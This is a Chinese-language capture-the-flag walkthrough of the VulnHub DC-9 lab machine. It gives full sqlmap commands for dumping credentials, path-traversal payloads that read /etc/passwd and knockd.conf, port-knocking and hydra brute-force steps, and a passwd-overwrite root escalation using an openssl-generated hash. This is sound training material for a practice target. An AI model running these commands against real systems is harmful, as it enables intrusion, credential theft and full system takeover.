总结:sql注入,端口敲门,覆盖passwd提权
下载地址
- DC-9.zip (Size: 700 MB)
- Download: http://www.five86.com/downloads/DC-9.zip
- Download (Mirror): https://download.vulnhub.com/dc/DC-9.zip
使用方法:解压后,使用vm打开ova文件
漏洞分析
信息收集
这里还是使用DC-1的方法
1.给靶机设置一个快照
2.fping -agq 192.168.1.0/24 使用fping快速扫描该网段中存活的机子
3.将靶机关闭重新扫描一下,对比少的那个ip就是靶机的ip
4.使用快照快速将靶机恢复
注:ip段要看自己的
有22端口,但是nmap不确定他是不是开的,这里我们直接去访问这个网站看看。
sql注入
这里在search那里看到一个搜索框,存在sql注入,这里直接使用sqlmap一把嗦
注意这里用的results.php,而不是search.php,我们要拦的包,他响应的。
扫出来这三个information_schema Staff user库,这里肯定是看Staff库了,然后发现了StaffDetails和Users表,这里查看Users表,然后查看 Password 和 Username字段
sqlmap -u "http://192.168.1.10/results.php" --data "search=1" --dbs --batch
sqlmap -u "http://192.168.1.10/results.php" --data "search=1" -D "Staff" --tables --dbs --batch
sqlmap -u "http://192.168.1.10/results.php" --data "search=1" -D "Staff" -T "Users" --columns --dbs --batch
sqlmap -u "http://192.168.1.10/results.php" --data "search=1" -D "Staff" -T "Users" -C "Username","Password" --dump --dbs
这里我们就得到了admin的密码了
admin:transorbital1
在这里我们可以登入
任意文件读取
找了半天没找到有什么提示。。。。去看看别人的才发现这里。。。。。呜呜呜┭┮﹏┭┮
http://靶机ip/welcome.php?file=../../../../../../etc/passwd
这里知道不少用户的账号, 而且都是/bin/bash,但是说22端口不知道是有没有开启的,然后吧,咱们又不知道干什么了。看看其他人的,这里我们就知道要去查看linux中的任务。
//查看linux的任务
http://靶机ip/welcome.php?file=../../../../../../proc/sched_debug
这里因为太乱了没有排序,这里教给大家一个好方法,这里直接ctrl+u直接查看源代码,他就会自动给我们排列了。
这里看到了knockd服务,去查看他的配置文件。
http://靶机ip/welcome.php?file=../../../../../../etc/knockd.conf
端口敲门
这里分析一下这个配置文件,在按循序访问了这个三个端口,linux防火墙就不会防我们了,iptables就是linux设置防火墙的命令,这里给大家推荐一个博客,看完也就理解端口敲门是用来看什么的了Web端口敲门的奇思妙想
nmap -sS 靶机ip -p 7469
nmap -sS 靶机ip -p 8475
nmap -sS 靶机ip -p 9842
//这里有一个工具也是可以的,但是感觉很慢
//没有需要自己下,apt install knockd
knock 靶机ip 7469 8475 9842
这里发现原本nmap不确定的22端口开了
ssh爆破
这里将原本passwd中/bin/bash的用户,提前装到user.txt中
echo "marym\njulied\nfredf\nbarneyr\ntomc\njerrym\nwilmaf\nbettyr\nchandlerb\njoeyt\nrachelg\nrossg\nmonicag\nphoebeb\nscoots\njanitor\njanitor2" > user.txt
这里我们使用hydra来爆破,记得设置线程,爆破了挺久
chandlerb:UrAG0D!
janitor:Ilovepeepee
这里ssh连接看看
chandlerb是没有什么东西,这里看看janitor,还好我都会使用ls -al看一遍果然发现了一个隐藏目录里面有一个password密码文件
BamBam01 Passw0rd smellycats P0Lic#10-4 B4-Tru3-001 4uGU5T-NiGHts
把这些放到爆破密码文件重新爆破一下
果然有多爆破出来两个,这里登进去看看
fredf:B4-Tru3-001
joeyt:Passw0rd
提权
经过查看joeyt没有什么东西 ,关键还是fredf,因为sudo -l发现东西了,但是感觉并不是什么命令之类的,不好提权,经过查看发现这是一个文件,但是里面的内容看不明白,这里查看去参考参考其他人,原来是用来覆盖passwd的呀,这个我熟。
//使用openssl命令
openssl passwd -1 -salt hahaha 123456
生成$1$hahaha$hSxFjZSHRoiEn4DYrrGUI.
//因为没有权限先来到tmp
echo 'hahaha:$1$hahaha$hSxFjZSHRoiEn4DYrrGUI.:0:0::/root/:/bin/bash' >> passwd
//这里使用test
sudo /opt/devstuff/dist/test/test passwd /etc/passwd
//然后替换到hahaha用户,密码123456
su hahaha